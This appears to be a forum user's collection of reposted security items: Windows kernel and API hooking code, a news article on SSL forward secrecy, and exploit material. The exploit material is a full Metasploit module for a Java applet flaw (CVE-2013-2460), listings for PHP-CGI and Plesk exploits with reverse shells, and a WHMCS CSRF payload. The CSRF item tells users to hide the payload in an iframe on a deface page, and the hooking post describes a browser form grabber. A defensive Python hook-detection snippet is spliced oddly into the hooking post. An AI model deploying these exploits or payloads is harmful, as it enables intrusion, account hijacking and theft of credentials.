Everything posted by Nytro

  1. My first SSDT hook driver
     by zwclose7

     Hello, this is my first SSDT hook driver. My driver will hook NtTerminateProcess, NtLoadDriver, NtOpenProcess and NtDeleteValueKey.

     NtTerminateProcess hook
     This hook will protect any process named calc.exe from being terminated.

     NtLoadDriver hook
     This hook will display the driver name in the debugger/DebugView.

     NtOpenProcess hook
     This hook will deny access to any process named cmd.exe, and will return STATUS_ACCESS_DENIED if the process name matches.

     NtDeleteValueKey hook
     This hook will protect any values named abcdef from being deleted.

     To load the driver, run the loader.exe in the release folder. This program will install the driver to the system, and then load it. All functions will be unhooked when the driver unloads.

     Attached Files
     SSDTHook.zip (287.99K)

     Source: My first SSDT hook driver - rohitab.com - Forums
  2. ExtendedHook Functions c++
     By RosDevil

     [intro]
     I decided to give away one of my master sources, a bunch of functions that are really useful to hook APIs (or any address) on x86 machines. (I'm writing an x64 version; it will be published as soon as possible.)

     Attached files: ExtendedHook.h (1.46K), ExtendedHook.cpp (3.21K)

     [index]
     This page is divided so:
     - Function Documentation
     - EHOOKSTRUCT structure
     - Usage
     - Compiler settings and notes to remember
     - Example 1# - hooking MessageBox
     - Example 2# - hooking DirectX (version 9 in this case)
     - Example 3# - hooking WSASend

     [Functions Documentation]
     There are 3 main functions (InstallEHook, InstallEHookEx, CustomEHook) and 1 to unhook (UninstallEHook).

     //InstallEHook
     bool InstallEHook(
         LPCSTR API,
         LPCTSTR lib,
         PEHOOKSTRUCT EHookA,
         void * redit
     );

     PARAMETERS
     LPCSTR API: the name of the API
     LPCTSTR lib: module name or path
     PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
     void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there.

     RETURN VALUE
     If the function succeeds it returns true, otherwise false.

     REMARKS
     This function first tries to get the module through GetModuleHandle of the given dll name or path; if it fails, it tries a LoadLibrary.

     --------------------------------------------------------------------------

     //InstallEHookEx
     bool InstallEHookEx(
         void * TargetAddress,
         PEHOOKSTRUCT EHookA,
         void * redit
     );

     PARAMETERS
     void * TargetAddress: in this case you give the address of the function to hook. This function is needed especially when you try to hook a function for which you don't have the definition but only the address. (See Example 2# to understand better)
     PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
     void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there.

     RETURN VALUE
     If the function succeeds it returns true, otherwise false.

     --------------------------------------------------------------------------

     //CustomEHook
     bool CustomEHook(
         void * TargetAddress,
         PEHOOKSTRUCT EHookA,
         void * redit,
         unsigned int bytes_jmp
     );

     PARAMETERS
     void * TargetAddress: in this case you give the address of the function to hook. This function is needed especially when you try to hook a function for which you don't have the definition but only the address. (See Example 2# to understand better)
     PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
     void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there.
     unsigned int bytes_jmp: integer that contains the number of bytes that must be copied to hook. This function is specific for the address of strange APIs that might have a particular beginning signature that the above functions don't recognize; mostly you will use this when trying to hook an address in the middle of an API, not at the beginning.

     RETURN VALUE
     If the function succeeds it returns true, otherwise false.

     REMARKS
     This function can easily crash if you are not careful: it does not check anything, and if the given bytes don't correspond to the end of a specific instruction you won't be able to call the original API; if you do, it will crash.

     --------------------------------------------------------------------------

     //UninstallEHook
     void * UninstallEHook(
         PEHOOKSTRUCT EHookA
     );

     PARAMETER
     PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT to uninstall the hook.

     RETURN VALUE
     If the function succeeds it returns the original address of the API, otherwise NULL.

     [EHOOKSTRUCT structure]
     This structure is the core of these functions.

     typedef struct _EHOOKSTRUCT{
         DWORD * adr_init;
         DWORD * adr_redirect;
         DWORD * adr_new_api;
         DWORD bytes_size;
     }EHOOKSTRUCT, *PEHOOKSTRUCT;

     MEMBERS
     DWORD * adr_init: Stores the original address
     DWORD * adr_redirect: Stores the address of the hook function
     DWORD * adr_new_api: Stores the address of the NEW API
     DWORD bytes_size: Number of bytes copied to perform the hook

     [usage]
     This is a general summary of how to use these functions. It's easier if you look at the examples.

     #include "ExtendedHook.h"

     typedef -type- ( -Api Prototype- ) ( -parameters- );
     EHOOKSTRUCT api_tohook;

     //define a function exactly the same as the prototype
     -type- Api_function_hook ( -parameters- );

     -type- Api_function_hook ( -parameters- ){
         //here you can manage the parameters
         //perform the call with any parameters you want, the right parameters or changed ones
         return ((-Api Prototype-)api_tohook.adr_new_api) (- parameters -);
     }

     int main(){
         if (InstallEHook("-Api name-", "-Api module-", &api_tohook, &Api_function_hook) == false){
             printf("Error hooking");
             return 1;
         }
         return 0;
     }

     [Compiler settings and notes to remember]
     This hooking method requires one change in the compiler settings.
     - Disable intrinsic functions [VC++]: Project -> Properties -> Configuration Property -> C/C++ -> Optimization -> Enable Intrinsic Functions -> [No]

     Notes
     - When you define the function prototype and its function hook, it must be the same as the original API, no changes in the parameters count; moreover remember to put WINAPI (__stdcall) in the definition when it is needed, otherwise it won't work.
     - There are some APIs that are necessary for any other API, like GetModuleHandle, GetProcAddress, LoadLibrary... if you want to hook these APIs remember not to call any other API inside the hook function that requires them, otherwise you will obtain an infinite loop.

     [Example 1# - hooking MessageBox]

     #include "stdafx.h"
     #include "windows.h"
     #include <iostream>
     #include "ExtendedHook.h"

     using namespace std;

     typedef int (WINAPI * pMessageBox)(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types); //function prototype
     int WINAPI MessageBoxWHooker(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types);    //function hook
     EHOOKSTRUCT myApi;               //essential structure
     pMessageBox myMessageBox = NULL; //optional, but I think it is useful

     int _tmain(int argc, _TCHAR* argv[])
     {
         if (InstallEHook("MessageBoxW", L"User32.dll", &myApi, &MessageBoxWHooker) == false){
             wcout<<"Error hooking"<<endl;
             return 1;
         }

         myMessageBox = (pMessageBox)myApi.adr_new_api; //[optional] this will be a MessageBox without hook
         myMessageBox(0, L"Hooking is my speciality!", L"ROSDEVIL", MB_OK | MB_ICONWARNING);

         if (MessageBox(0, L"Hi, did you understand?", L"ehi", MB_YESNO) == IDYES) { //this will be hooked!
             wcout<<"You have pressed yes"<<endl;
         }else{
             wcout<<"You have pressed no"<<endl;
         }

         UninstallEHook(&myApi);
         cin.get();
         return 0;
     }

     int WINAPI MessageBoxWHooker(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types){
         wcout<<"-- MessageBoxW hooked!"<<endl;
         wcout<<"HWND: "<<myhandle<<endl;
         wcout<<"Text: "<<text<<endl;
         wcout<<"Caption: "<<caption<<endl;
         wcout<<"Buttons/Icon: "<<types<<endl;
         //call the original API through the trampoline saved in adr_new_api
         return ((pMessageBox)myApi.adr_new_api)(myhandle, text, caption, types);
     }

     [Example 2# - hooking DirectX (version 9 in this case)]
     This is a cool example, a dll that must be injected from the very beginning of the game. If you delve into DirectX hooking you will know what I'm talking about. It has been tested on Age of Empires 3 (x86).

     //AgeOfEmpireHook.dll
     #include "stdafx.h"
     #include "windows.h"
     #include "d3dx9.h"
     #include "ExtendedHook.h"

     #pragma comment(lib, "d3dx9.lib")

     void start_hooking();
     void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height);

     int times_load = 0;
     typedef DWORD D3DCOLOR;
     IDirect3DDevice9 * DeviceInterface;

     //hook Direct3DCreate9
     typedef IDirect3D9 *(WINAPI * pDirect3DCreate9) (UINT SDKVersion);
     EHOOKSTRUCT api_Direct3DCreate9;
     IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion);

     //hook CreateDevice
     typedef HRESULT (APIENTRY * pCreateDevice)(
         IDirect3D9 * pDev,
         UINT Adapter,
         D3DDEVTYPE DeviceType,
         HWND hFocusWindow,
         DWORD BehaviorFlags,
         D3DPRESENT_PARAMETERS* pPresentationParameters,
         IDirect3DDevice9** ppReturnedDeviceInterface
     );
     EHOOKSTRUCT api_CreateDevice;
     HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface);

     //Hook EndScene
     typedef HRESULT (WINAPI * pEndScene)(IDirect3DDevice9 * pDevInter);
     EHOOKSTRUCT api_EndScene;
     HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter);

     BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
     {
         switch (ul_reason_for_call)
         {
         case DLL_PROCESS_ATTACH:
             start_hooking();
             break;
         case DLL_THREAD_ATTACH:
         case DLL_THREAD_DETACH:
         case DLL_PROCESS_DETACH:
             break;
         }
         return TRUE;
     }

     void start_hooking(){
         if (InstallEHook("Direct3DCreate9", L"d3d9.dll", &api_Direct3DCreate9, &Direct3DCreate9_Hook)==false){
             MessageBox(0, L"Error while hooking Direct3DCreate9", L"Hooker", MB_OK | MB_ICONWARNING);
         }
         return;
     }

     IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion){
         IDirect3D9 * pDev = ((pDirect3DCreate9)api_Direct3DCreate9.adr_new_api)(SDKVersion);
         _asm pushad
         DWORD * vtable = (DWORD*)*((DWORD*)pDev); //VTABLE
         if (times_load == 1){ //the first time d3d9.dll is used isn't for the game making, we need the second
             InstallEHookEx((void*)vtable[16], &api_CreateDevice, &CreateDevice_hook); //CreateDevice
         }
         times_load += 1;
         _asm popad
         return pDev;
     }

     HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface){
         HRESULT final = ((pCreateDevice)api_CreateDevice.adr_new_api)(pDev, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface);
         _asm pushad
         DWORD * DevInterface = (DWORD*)*((DWORD*)*ppReturnedDeviceInterface); //VTABLE
         InstallEHookEx((void*)DevInterface[42], &api_EndScene, &EndScene_hook); //EndScene
         _asm popad
         return final;
     }

     HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter){
         _asm pushad
         WriteText(pDevInter, L"AGE OF EMPIRES EXTENDED HOOK BY ROSDEVIL", 20, 20, 300, 50);
         if (GetAsyncKeyState(VK_F1)) WriteText(pDevInter, L"Hooked functions:\n - CreateDevice\n - EndScene\n", 20, 50, 150, 100);
         _asm popad
         return ((pEndScene)api_EndScene.adr_new_api)(pDevInter);
     }

     void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height){
         ID3DXFont *m_font;
         D3DXCreateFont(d3ddev, 15, 0, FW_BOLD, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, TEXT("Arial"), &m_font );
         D3DCOLOR fontColor1 = D3DCOLOR_XRGB(255, 0, 0);
         RECT space;
         space.top = y;
         space.left = x;
         space.right = width + x;
         space.bottom = height + y;
         m_font->DrawText(NULL, text, -1, &space, 0, fontColor1);
         m_font->Release();
     }

     [Example 3# - hooking WSASend]
     This example is again a dll, but it doesn't require to be injected at the very beginning, since the function that we are going to hook doesn't belong to any class. It has been tested on Chrome to create a FormGrabber.

     //ChromeHook.dll
     #include "stdafx.h"
     #include "windows.h"
     #include "ExtendedHook.h"

     bool first = true;
     void start_hooking();

     //I don't want to include all winsock.h so let's declare what we need:
     //(you can include winsock.h, it's quicker)
     typedef unsigned int SOCKET;
     typedef void* LPWSAOVERLAPPED_COMPLETION_ROUTINE;

     typedef struct __WSABUF {
         unsigned long len;
         char FAR *buf;
     } WSABUF, *LPWSABUF;

     typedef struct _WSAOVERLAPPED {
         ULONG_PTR Internal;
         ULONG_PTR InternalHigh;
         union {
             struct {
                 DWORD Offset;
                 DWORD OffsetHigh;
             };
             PVOID Pointer;
         };
         HANDLE hEvent;
     } WSAOVERLAPPED, *LPWSAOVERLAPPED;

     //hook WSASend
     typedef int (WINAPI * pWSASend)(
         SOCKET s,
         LPWSABUF lpBuffers,
         DWORD dwBufferCount,
         LPDWORD lpNumberOfBytesSent,
         DWORD dwFlags,
         LPWSAOVERLAPPED lpOverlapped,
         LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
     );
     EHOOKSTRUCT api_WSASend;
     int WINAPI WSASend_hook(
         SOCKET s,
         LPWSABUF lpBuffers,
         DWORD dwBufferCount,
         LPDWORD lpNumberOfBytesSent,
         DWORD dwFlags,
         LPWSAOVERLAPPED lpOverlapped,
         LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
     );

     BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
     {
         switch (ul_reason_for_call)
         {
         case DLL_PROCESS_ATTACH:
             start_hooking();
             break;
         case DLL_THREAD_ATTACH:
         case DLL_THREAD_DETACH:
         case DLL_PROCESS_DETACH:
             break;
         }
         return TRUE;
     }

     void start_hooking(){
         if (InstallEHook("WSASend", L"Ws2_32.dll", &api_WSASend, &WSASend_hook)==false){
             MessageBox(0, L"Error while hooking WSASend", L"Hooker", MB_OK | MB_ICONWARNING);
         }
     }

     int WINAPI WSASend_hook(
         SOCKET s,
         LPWSABUF lpBuffers,
         DWORD dwBufferCount,
         LPDWORD lpNumberOfBytesSent,
         DWORD dwFlags,
         LPWSAOVERLAPPED lpOverlapped,
         LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
     ){
         _asm pushad
         if (first == true){ //only show the first time a call is intercepted
             MessageBox(0, L"WSASEND FIRST INTERCEPTED!", L"CHROME HOOK", MB_OK);
             first = false;
         }
         //NOW WE CAN HANDLE, CRACK, COPY, ALTER, SMASH, ABORT all its parameters!
         //... your code man ...
         _asm popad
         return ((pWSASend)api_WSASend.adr_new_api)(s, lpBuffers, dwBufferCount, lpNumberOfBytesSent, dwFlags, lpOverlapped, lpCompletionRoutine);
     }

     Well, we're done!
     PUT LIKE IF YOU APPRECIATE

     I've updated my ExtendedHook.cpp, there was a little bug about the bytes to copy. [see attachment]

     RosDevil

     Source: ExtendedHook Functions c++ - rohitab.com - Forums
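A hook of the kind the post above installs overwrites the first EHOOKSTRUCT.bytes_size bytes of the target function with a transfer to the hook, so from the defender's side the check is the inverse: compare an exported function's live prologue with a clean copy and decode any jump at its start. The following is an added example, not code from the ExtendedHook post; the prologue bytes, addresses and function names are constructed for illustration and assume 32-bit x86.

```python
import struct

# Constructed sample: the hot-patchable prologue (mov edi,edi; push ebp; mov ebp,esp)
# that many 32-bit Win32 API entry points begin with.
CLEAN_PROLOGUE = bytes.fromhex("8BFF558BEC")


def decode_jump(prologue: bytes, va: int):
    """Decode the control transfers an x86 inline hook commonly writes at a
    function start. Returns (kind, absolute target) or None.
      E9 rel32      jmp near; target is relative to the end of the 5-byte instruction
      68 imm32 C3   push target / ret
      FF 25 disp32  jmp dword ptr [disp32]; the returned value is the pointer slot
    """
    if len(prologue) >= 5 and prologue[0] == 0xE9:
        rel = struct.unpack("<i", prologue[1:5])[0]
        return ("jmp rel32", (va + 5 + rel) & 0xFFFFFFFF)
    if len(prologue) >= 6 and prologue[0] == 0x68 and prologue[5] == 0xC3:
        return ("push/ret", struct.unpack("<I", prologue[1:5])[0])
    if len(prologue) >= 6 and prologue[0] == 0xFF and prologue[1] == 0x25:
        return ("jmp [abs32]", struct.unpack("<I", prologue[2:6])[0])
    return None


def check_prologue(live: bytes, clean: bytes, va: int,
                   module_base: int, module_size: int) -> dict:
    """Compare the live prologue of an exported function at `va` with a clean
    copy (for example read from the module's file on disk and relocated).
      modified  the live bytes differ from the clean copy; a library that copies
                bytes_size bytes away and patches a jump in always trips this
      hooked    modified, or a leading jump whose target lies outside the module
                that owns the function (an injected DLL, a heap trampoline, ...)
    """
    n = min(len(live), len(clean))
    modified = live[:n] != clean[:n]
    result = {"modified": modified, "hooked": modified, "kind": None,
              "target": None, "target_outside_module": None}
    jump = decode_jump(live, va)
    if jump is not None:
        kind, target = jump
        outside = not (module_base <= target < module_base + module_size)
        result.update(kind=kind, target=target, target_outside_module=outside,
                      hooked=modified or outside)
    return result


# Constructed layout (hypothetical addresses): a MessageBoxW-like export at
# 0x77D507EA inside a module mapped at 0x77D40000 (size 0x90000); the hook
# function lives in an injected DLL at 0x10001000.
MODULE_BASE, MODULE_SIZE = 0x77D40000, 0x90000
FUNC_VA = 0x77D507EA
HOOK_VA = 0x10001000
# jmp rel32 to HOOK_VA: rel = 0x10001000 - (0x77D507EA + 5) = -0x67D4F7EF = 0x982B0811
HOOKED_PROLOGUE = bytes.fromhex("E911082B98")
# A function whose clean prologue legitimately starts with a jump inside its own
# module (target 0x77D41000): rel = -0xF7EF = 0xFFFF0811. Not a hook.
INTRA_MODULE_JMP = bytes.fromhex("E91108FFFF")

if __name__ == "__main__":
    for label, live, clean in (("clean", CLEAN_PROLOGUE, CLEAN_PROLOGUE),
                               ("hooked", HOOKED_PROLOGUE, CLEAN_PROLOGUE),
                               ("intra-module jump", INTRA_MODULE_JMP, INTRA_MODULE_JMP)):
        print(label, check_prologue(live, clean, FUNC_VA, MODULE_BASE, MODULE_SIZE))
```

On a live system the clean copy would come from the module's on-disk image and the live bytes from ReadProcessMemory; the comparison must be made after applying relocations, or the intra-module case above will false-positive.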
  3. A simple SSL tweak could protect you from GCHQ/NSA snooping
     It might slow you down, but hey, you can't have everything
     By John Leyden, 26th June 2013

     An obscure feature of SSL/TLS called Forward Secrecy may offer greater privacy, according to security experts who have begun promoting the technology in the wake of revelations about mass surveillance by the NSA and GCHQ.

     Every SSL connection begins with a handshake, during which the two parties in an encrypted message exchange perform authentication and agree on their session keys, through a process called key exchange. The session keys are used for a limited time and deleted afterwards. The key exchange phase is designed to allow two users to exchange keys without allowing an eavesdropper to intercept or capture these credentials.

     Several key exchange mechanisms exist but the most widely used mechanism is based on the well-known RSA algorithm, explains Ivan Ristic, director of engineering at Qualys. This approach relies on the server's private key to protect session keys.

     "This is an efficient key exchange approach, but it has an important side-effect: anyone with access to a copy of the server's private key can also uncover the session keys and thus decrypt everything," Ristic warns.

     This capability makes it possible for enterprise security tools - such as intrusion detection and web application firewalls - to screen otherwise undecipherable SSL encrypted traffic, given a server's private keys. This feature has become a serious liability in the era of mass surveillance.

     GCHQ have been secretly tapping hundreds of fibre-optic cables to tap data, The Guardian reported last week, based on documents leaked to the paper by former NSA contractor turned whistleblower Edward Snowden. The NSA also carries out deep packet inspection analysis of traffic passing through US fibre optic networks.

     Related revelations show that the NSA applies particular attention - and special rules - to encrypted communications, such as PGP-encrypted emails and SSL encrypted messages. Captured data should really be destroyed within five years, unless it consists of "communications that are enciphered or reasonably believed to contain secret meaning, and sufficient duration may consist of any period of time during which encrypted material is subject to, or of use in, cryptanalysis", according to the terms of a leaked Foreign Intelligence Surveillance Court order.

     The upshot is that intelligence agencies are collecting all the traffic they can physically capture before attempting to snoop upon encrypted content, where possible. These techniques are currently only practical for intelligence agencies but this may change over time - and those interested in protecting privacy need to act sooner rather than later, Ristic argues.

     "Your adversaries might not have your private key today, but what they can do now is record all your encrypted traffic," Ristic explains. "Eventually, they might obtain the key in one way or another - for example, by bribing someone, obtaining a warrant, or by breaking the key after sufficient technology advances. At that point, they will be able to go back in time to decrypt everything."

     The Diffie–Hellman protocol offers an alternative algorithm to RSA for cryptographic key exchange. Diffie–Hellman is slower but generates more secure session keys that can't be recovered simply by knowing the server's private key, a protocol feature called Forward Secrecy.

     "Breaking strong session keys is clearly much more difficult than obtaining servers' private keys, especially if you can get them via a warrant," Ristic explains. "Furthermore, in order to decrypt all communication, now you can no longer compromise just one key - the server's - but you have to compromise the session keys belonging to every individual communication session."

     Someone with access to the server's private key can perform an active man-in-the-middle attack and impersonate the target server. However, they can do that only at the time the communication is taking place. It is not possible to pile up mountains of encrypted traffic for later decryption. So, Forward Secrecy still creates a significant obstacle against industrial scale snooping.

     SSL supports Forward Secrecy using two algorithms: Diffie-Hellman (DHE) and the adapted version for use with Elliptic Curve cryptography (ECDHE). The main obstacle to using Forward Secrecy has been that Diffie-Hellman is significantly slower, leading to a decision by many website operators to disable the feature in order to get better performance.

     "In recent years, we've seen DHE fall out of fashion. Internet Explorer 9 and 10, for example, support DHE only in combination with obsolete DSA keys," Ristic explains, adding that ECDHE is a bit faster than DHE but still slower than RSA. In addition, ECDHE algorithms are relatively new and not as widely supported in web server software packages.

     The vast majority of modern browsers support ECDHE. Website admins who add support for the encryption technique would help the majority of their privacy-conscious customers, and adding DHE allows Forward Secrecy to be offered to the rest.

     A blog post by Ristic explains how to enable Forward Secrecy on SSL web servers, as well as providing a good explanation of why the technology is beneficial for privacy - and noting the limitations of the technique.

     "Although the use of Diffie-Hellman key exchange eliminates the main attack vector, there are other actions a powerful adversary could take," Ristic warns. "For example, they could convince the server operator to simply record all session keys."

     "Server-side session management mechanisms could also impact Forward Secrecy. For performance reasons, session keys might be kept for many hours after the conversation had been terminated.

     "In addition, there is an alternative session management mechanism called session tickets, which uses separate encryption keys that are rarely rotated - possibly never in extreme cases.

     "Unless you understand your session tickets implementation very well, this feature is best disabled to ensure it does not compromise Forward Secrecy," Ristic concludes.

     Ristic founded SSL Labs, a research project to measure and track the effective security of SSL on the internet. He has over time worked with other security luminaries such as Taher Elgamal, one of the creators of the SSL protocol, and Moxie Marlinspike, creator of Convergence, to tackle SSL governance and implementation issues and promote best practice.

     Whether sysadmins switch to more privacy-friendly key exchange methods in spite of performance drawbacks is by no means sure, but publicising the issue at least gives them the chance to decide for themselves. ®

     Source: A simple SSL tweak could protect you from GCHQ/NSA snooping • The Register
  4. Java Applet ProviderSkeleton Insecure Invoke Method
     Authored by Adam Gowdiak, Matthias Kaiser | Site metasploit.com

     This Metasploit module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

     ##
     # This file is part of the Metasploit Framework and may be subject to
     # redistribution and commercial restrictions. Please see the Metasploit
     # web site for more information on licensing and terms of use.
     # http://metasploit.com/
     ##

     require 'msf/core'
     require 'rex'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

       include Msf::Exploit::Remote::HttpServer::HTML
       include Msf::Exploit::EXE
       include Msf::Exploit::Remote::BrowserAutopwn
       autopwn_info({ :javascript => false })

       EXPLOIT_STRING = "Exploit"

       def initialize( info = {} )
         super( update_info( info,
           'Name'           => 'Java Applet ProviderSkeleton Insecure Invoke Method',
           'Description'    => %q{
               This module abuses the insecure invoke() method of the ProviderSkeleton class that
             allows to call arbitrary static methods with user supplied arguments. The vulnerability
             affects Java version 7u21 and earlier.
           },
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               'Adam Gowdiak',   # Vulnerability discovery according to Oracle's advisory and also POC
               'Matthias Kaiser' # Metasploit module
             ],
           'References'     =>
             [
               [ 'CVE', '2013-2460' ],
               [ 'OSVDB', '94346' ],
               [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
               [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
               [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
               [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
             ],
           'Platform'       => [ 'java', 'win', 'osx', 'linux' ],
           'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
           'Targets'        =>
             [
               [ 'Generic (Java Payload)',
                 {
                   'Platform' => ['java'],
                   'Arch' => ARCH_JAVA,
                 }
               ],
               [ 'Windows x86 (Native Payload)',
                 {
                   'Platform' => 'win',
                   'Arch' => ARCH_X86,
                 }
               ],
               [ 'Mac OS X x86 (Native Payload)',
                 {
                   'Platform' => 'osx',
                   'Arch' => ARCH_X86,
                 }
               ],
               [ 'Linux x86 (Native Payload)',
                 {
                   'Platform' => 'linux',
                   'Arch' => ARCH_X86,
                 }
               ],
             ],
           'DefaultTarget'  => 0,
           'DisclosureDate' => 'Jun 18 2013'
         ))
       end

       def randomize_identifier_in_jar(jar, identifier)
         identifier_str = rand_text_alpha(identifier.length)
         jar.entries.each { |entry|
           entry.name.gsub!(identifier, identifier_str)
           entry.data = entry.data.gsub(identifier, identifier_str)
         }
       end

       def setup
         path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class")
         @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

         path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class")
         @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

         path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")
         @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

         @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
         @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)
         super
       end

       def on_request_uri(cli, request)
         print_status("handling request for #{request.uri}")

         case request.uri
         when /\.jar$/i
           jar = payload.encoded_jar
           jar.add_file("#{@exploit_class_name}.class", @exploit_class)
           jar.add_file("ExpProvider.class", @provider_class)
           jar.add_file("DisableSecurityManagerAction.class", @action_class)
           randomize_identifier_in_jar(jar, "metasploit")
           randomize_identifier_in_jar(jar, "payload")
           jar.build_manifest

           send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
         when /\/$/
           payload = regenerate_payload(cli)
           if not payload
             print_error("Failed to generate the payload.")
             send_not_found(cli)
             return
           end

           send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
         else
           send_redirect(cli, get_resource() + '/', '')
         end
       end

       def generate_html
         html = %Q|
     <html>
     <body>
     <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
     </body>
     </html>
         |
         return html
       end

     end

     Source: Java Applet ProviderSkeleton Insecure Invoke Method ≈ Packet Storm
  5. PHP-CGI Argument Injection
     Authored by infodox

     Exploit for the PHP-CGI argument injection vulnerability disclosed in 2012. Has file uploading, inline shell spawning, and both python and perl reverse shell implementations using an earlier version of the "payload" library written for such exploits.

     Download: http://packetstormsecurity.com/files/download/122162/phpcgi.tar.gz

     Source: PHP-CGI Argument Injection ≈ Packet Storm
  6. Plesk PHP Code Injection
     Authored by Kingcope, infodox

     Reliable exploit for the Plesk PHP code injection vulnerability disclosed by Kingcope in June 2013. Can deliver inline and reverse shells using the payloads library, as well as offering (buggy) file upload features.

     Download: http://packetstormsecurity.com/files/download/122163/plesk-php.tar.gz

     Source: Plesk PHP Code Injection ≈ Packet Storm
  7. WHMCS Cross Site Request Forgery

     ###########################################################################
     # Exploit Title: WHMCS [CSRF] All Versions (0day)
     # Team: MaDLeeTs
     # Software Link: http://www.whmcs.com
     # Version: All
     # Site: http://www.MaDLeeTs.com
     # Email: LeeTHaXor@Y7Mail.com
     #######################Video#######################################
     http://vimeo.com/63686629
     ###########################################################################

     https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel:+603.86560268+Fax:+603.8?6560768

     ########################iFrame Code To Add On Deface##############################
     <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe>

     Example:
     <IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1=B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield%5B1%5D=max%40antswork.com&customfield%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&customfield%5B4%5D=%2B603.90578663&customfield%5B5%5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&customfield%5B7%5D=&customfield%5B8%5D=&customfield%5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel%3A+603.86560268+Fax%3A?+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe>
     ###########################################################################

     All you need to do is add it into your Deface page and make your target view the deface page. He MUST log in first into his clientarea in order to get his email updated.

     ###########################################################################
